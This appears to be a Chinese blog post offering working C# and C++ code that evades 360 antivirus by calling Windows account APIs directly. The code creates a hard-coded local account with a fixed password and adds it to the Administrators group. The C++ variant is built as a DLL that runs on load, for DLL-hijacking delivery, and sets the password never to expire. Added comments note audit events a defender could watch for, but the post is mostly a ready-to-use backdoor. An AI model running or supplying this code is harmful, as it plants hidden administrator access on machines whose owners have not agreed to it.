今天在群里看到一位大佬发的绕过360安全卫士添加系统用户权限的脚本,于是乎,我便下载下来分析,发现它是通过调用系统 API 函数来规避杀软的:
所以我就蹭一波热度,自己写了个 C# 版本的, Class 类如下:
using System;
using System.Runtime.InteropServices;
namespace Bypass360
{
public class LocalGroupUserHelper
{
    /// <summary>
    /// P/Invoke to Netapi32 NetUserAdd: creates a local account through the account-management
    /// API instead of spawning <c>net user</c>. That is the whole "bypass" the article describes:
    /// no child process is created, so hooks that watch for net.exe / cmd.exe see nothing.
    /// NOTE(review): the account creation itself is still subject to Windows security auditing
    /// (typically Security event 4720, "A user account was created"), so detection of this
    /// technique belongs on the audit log rather than on process creation.
    /// </summary>
    /// <param name="servername">Target machine; null means the local machine.</param>
    /// <param name="level">Information level of <paramref name="buf"/>; this file always passes 1 (USER_INFO_1).</param>
    /// <param name="buf">The USER_INFO_1 describing the account to create.</param>
    /// <param name="parm_err">Declared as a plain int and always passed 0 here, which presumably stands for a NULL
    /// pointer, so no index of the rejected field is ever returned to the caller.</param>
    /// <returns>0 on success, non-zero on failure.</returns>
    [DllImport("Netapi32.dll")]
    extern static int NetUserAdd([MarshalAs(UnmanagedType.LPWStr)] string servername, int level, ref USER_INFO_1 buf, int parm_err);

    /// <summary>
    /// P/Invoke to Netapi32 NetLocalGroupAddMembers: adds members to a local group.
    /// NOTE(review): a membership change on a privileged local group is an audit event in its own
    /// right (typically Security event 4732); seen right after a 4720 from the same process it is a
    /// high-signal sequence.
    /// </summary>
    /// <param name="servername">Target machine; null means the local machine.</param>
    /// <param name="groupname">Local group to modify (this file passes "Administrators").</param>
    /// <param name="level">Information level of <paramref name="buf"/>; this file always passes 3 (member given by name).</param>
    /// <param name="buf">The single LOCALGROUP_MEMBERS_INFO_3 entry to add.</param>
    /// <param name="totalentries">Number of entries in <paramref name="buf"/>; this file always passes 1.</param>
    /// <returns>0 on success, non-zero on failure.</returns>
    [DllImport("Netapi32.dll")]
    extern static int NetLocalGroupAddMembers([MarshalAs(UnmanagedType.LPWStr)] string servername, [MarshalAs(UnmanagedType.LPWStr)] string groupname,
    int level, ref LOCALGROUP_MEMBERS_INFO_3 buf, int totalentries);

    /// <summary>
    /// Managed mirror of the native LOCALGROUP_MEMBERS_INFO_3 (level 3: member identified by name).
    /// Sequential Unicode layout, so the single string field marshals as a wide string regardless of
    /// its managed name.
    /// </summary>
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct LOCALGROUP_MEMBERS_INFO_3
    {
        public string domainandname; // native lgrmi3_domainandname; this file passes a bare user name without a domain prefix
    }

    /// <summary>
    /// Managed mirror of the native USER_INFO_1. Because the layout is Sequential, only the field
    /// order and types matter for marshalling; the managed names are free (note <c>comment</c>
    /// stands in for the native usri1_comment).
    /// </summary>
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct USER_INFO_1
    {
        public string usri1_name;          // account name
        public string usri1_password;      // initial password, passed in clear text to the API
        public int usri1_password_age;     // never set by this file; stays 0
        public int usri1_priv;             // privilege level; AddUser sets 1 (USER_PRIV_USER)
        public string usri1_home_dir;      // always null in this file
        public string comment;             // native usri1_comment
        public int usri1_flags;            // never set by this file; stays 0 (contrast the C++ variant below, which sets UF_* flags)
        public string usri1_script_path;   // always null in this file
    }

    /// <summary>
    /// Creates a local user account with USER_PRIV_USER privilege. On failure only
    /// "Error Adding User" is written to the console; the non-zero status code returned by
    /// NetUserAdd is discarded, so the caller cannot tell why the call was rejected.
    /// </summary>
    /// <param name="serverName">Machine name; null for the local machine.</param>
    /// <param name="userName">Account name to create.</param>
    /// <param name="password">Initial password for the account.</param>
    /// <param name="strComment">Account comment; may be null.</param>
    public void AddUser(string serverName, string userName, string password, string strComment)
    {
        USER_INFO_1 NewUser = new USER_INFO_1(); // fresh USER_INFO_1; every field not assigned below stays 0 / null
        NewUser.usri1_name = userName;           // account name
        NewUser.usri1_password = password;       // initial password
        NewUser.usri1_priv = 1;                  // USER_PRIV_USER; admin rights are granted later by group membership, not here
        NewUser.usri1_home_dir = null;           // no home directory
        NewUser.comment = strComment;            // free-text comment on the account
        NewUser.usri1_script_path = null;        // no logon script
        // usri1_flags is deliberately left untouched (0) by this file.
        if (NetUserAdd(serverName, 1, ref NewUser, 0) != 0) // level 1 = USER_INFO_1; non-zero status = failure
        {
            Console.WriteLine("Error Adding User");
        }
    }

    /// <summary>
    /// Adds one user to a local group by name. Paired with <see cref="AddUser"/> in Main this is
    /// the step that turns a plain account into an "Administrators" member. On failure only
    /// "Error Adding Group Member" is printed; the status code is discarded.
    /// </summary>
    /// <param name="serverName">Machine name; null for the local machine.</param>
    /// <param name="groupName">Local group to add the member to.</param>
    /// <param name="userName">Member name, passed through unchanged as lgrmi3_domainandname.</param>
    public void GroupAddMembers(string serverName, string groupName, string userName)
    {
        LOCALGROUP_MEMBERS_INFO_3 NewMember = new LOCALGROUP_MEMBERS_INFO_3();
        NewMember.domainandname = userName; // bare user name; no "domain\" prefix is added
        if (NetLocalGroupAddMembers(serverName, groupName, 3, ref NewMember, 1) != 0) // level 3 = by name, one entry; non-zero = failure
        {
            Console.WriteLine("Error Adding Group Member");
        }
    }
}
}
在 Class 类中定义了系统需要用到的 API 函数
Main 类如下:
using System;
using System.Runtime.InteropServices;
using Bypass360;
namespace Bypass360Add
{
public static class BypassUAC_csharp
{
    /// <summary>Kernel32 ExitProcess, used to terminate the process instead of returning from Main.</summary>
    [DllImport("kernel32.dll")]
    static extern void ExitProcess(uint uExitCode);

    /// <summary>
    /// Entry point: creates the account and then adds it to the Administrators group, both on the
    /// local machine (null server name). Account name, password and group are hard-coded string
    /// constants; such constants are exactly what static AV signatures key on, so the API-level
    /// "bypass" buys little once the binary itself is known. NOTE(review): despite the class name
    /// nothing here interacts with UAC — it is plain local-account creation, which presumably
    /// already requires the caller to hold administrative rights (NetUserAdd is not a privilege
    /// escalation).
    /// </summary>
    public static void Main(string[] args)
    {
        LocalGroupUserHelper local = new LocalGroupUserHelper();
        string username = "wh4am1";        // hard-coded account name (same value as in the C++ variant on this page)
        string password = "qqai@love";     // hard-coded password
        string groupname = "Administrators";
        local.AddUser(null, username, password, null);   // null server = local machine, null comment
        local.GroupAddMembers(null, groupname, username); // privilege step: membership in Administrators
        ExitProcess(1);                                   // hard exit with code 1 regardless of success; only the helper's console lines report failure
    }
}
}
运行后会在目标机器上创建一个用户为 wh4am1 密码为 qqai@love 的 Administrators 组用户
当然,如果是想利用 Dll 劫持等方式来添加用户,我也提供上 C++ Dll 的代码
#include
#include
#include
#include
#pragma comment(lib,"netapi32.lib")
// Despite the name this creates no thread: it runs synchronously on whichever thread is
// executing DllMain (see below). Creates the local account and adds it to Administrators.
// Both API return values and dwError are ignored, so any failure is silent.
// NOTE(review): ui is not zero-initialized and usri1_password_age is never assigned, so
// that field holds an indeterminate value when the struct is passed to NetUserAdd.
void StartExploitThread() {
    USER_INFO_1 ui;
    DWORD dwError = 0;                          // parm_err output slot; written by the API but never read afterwards
    ui.usri1_name = (LPWSTR) L"wh4am1";         // hard-coded account name (matches the C# variant)
    ui.usri1_password = (LPWSTR) L"qqai@love";  // hard-coded password
    ui.usri1_priv = USER_PRIV_USER;             // ordinary user; admin rights come from the group add below
    ui.usri1_home_dir = NULL;
    ui.usri1_comment = (LPWSTR) "";             // NOTE(review): unlike the other strings this is a narrow literal cast to LPWSTR
    // UF_SCRIPT: logon script executes; UF_DONT_EXPIRE_PASSWD: password never expires;
    // UF_PASSWD_CANT_CHANGE: the user cannot change the password.
    // The latter two on a freshly created account are a persistence pattern worth alerting on.
    ui.usri1_flags = UF_SCRIPT | UF_DONT_EXPIRE_PASSWD | UF_PASSWD_CANT_CHANGE;
    ui.usri1_script_path = NULL;
    NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError); // NULL server = local machine; level 1 = USER_INFO_1; status ignored
    LOCALGROUP_MEMBERS_INFO_3 account;
    account.lgrmi3_domainandname = (LPWSTR)L"wh4am1"; // bare user name, no domain prefix
    NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1); // level 3 = by name, one entry; status ignored
}
// Standard DLL entry point. The payload runs inline on DLL_PROCESS_ATTACH, i.e. in the
// context of whatever process loads this DLL — the DLL-hijacking delivery the article
// mentions, which is why the loading process, not a new one, is what a defender would
// see performing the account creation. Thread attach/detach and process detach do
// nothing. The function always reports TRUE, so the host keeps the DLL loaded even if
// the account creation failed.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        StartExploitThread(); // runs synchronously inside the loader callback; no thread is created
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
成功效果如下: